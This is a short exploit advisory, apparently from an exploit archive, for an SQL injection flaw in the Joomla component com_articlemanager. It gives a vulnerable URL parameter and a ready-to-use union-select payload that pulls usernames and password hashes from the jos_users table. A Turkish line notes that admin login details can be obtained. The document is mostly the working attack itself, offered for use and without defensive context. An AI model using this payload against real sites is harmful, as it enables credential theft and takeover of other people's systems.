id: 10674
date: 01/14/2010
title: Joomla Component com_articlemanager SQL Injection Vulnerability
author: Fl0riX
cves: 

===============================================================
Joomla Component com_articlemanager SQL Injection Vulnerability
===============================================================

########################################################################
#        Joomla Component com_articlemanager SQL Injection Vulnerability
########################################################################
# Author   :FL0RiX
#
# Name     : com_articlemanager
#
# Bug Type   : SQL Injection
#
# Infection    : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://[server]/index.php?option=com_articlemanager&Itemid=349&task=display&artid=
#
#EXPLOIT : null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users--
########################################################################



#  0day.today [2023-03-23]  #